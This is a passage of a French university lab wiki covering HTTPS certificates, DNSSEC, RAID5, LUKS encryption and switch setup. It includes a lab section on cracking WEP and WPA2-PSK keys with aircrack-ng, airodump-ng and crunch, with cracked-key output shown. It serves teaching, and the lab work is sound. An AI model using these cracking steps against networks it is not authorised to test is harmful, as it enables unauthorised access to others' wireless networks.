&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `/etc/fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. &lt;br /&gt;
==== Remettre à zero la clef USB ====&lt;br /&gt;
Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sda''' (il peut aussi s'appeler sdb ,sdc ...)&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sda&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1): '''1'''&lt;br /&gt;
First sector (1-1953525167, default 2048):'''1'''&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size 7.1GiB.&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de la Clef ====&lt;br /&gt;
La clef est prête, on peut desormais crypter et l'utiliser avec l'utilitaire cyptsetup.&lt;br /&gt;
Pour créer le cryptage au format Luks :&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
==== Accès à la partition cryptée ====&lt;br /&gt;
Maintenant que la clef est cryptée, on peut l'utiliser. Pour commencer, on va monter le répertoire pour pouvoir l'ouvrir. Commencez par créer un repertoire '''/mnt/clef_usb_cryptee''' puis taper la suite de commande :&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb home -- ouverture de la clef&lt;br /&gt;
    mkfs.ext4 /dev/mapper/home -- Système de fichier relié &lt;br /&gt;
    mount -t ext4 /dev/mapper/home /mnt/clef_usb_cryptee&lt;br /&gt;
&lt;br /&gt;
On peut maintenant acceder au contenu de la clef et le modifier via le dossier '''/mnt/clef_usb_cryptee'''&lt;br /&gt;
&lt;br /&gt;
==== Debrancher la partition cryptée ====&lt;br /&gt;
Pour débrancher la clef, il faut au préalable démonter la partition et refermer l'utilitaire via les commandes:&lt;br /&gt;
  umount /mnt/clef_usb_cryptee -- Demonter le repertoire&lt;br /&gt;
  cryptsetup close --type luks home&lt;br /&gt;
Et voila, vous pouvez désormais retirer la clef.&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
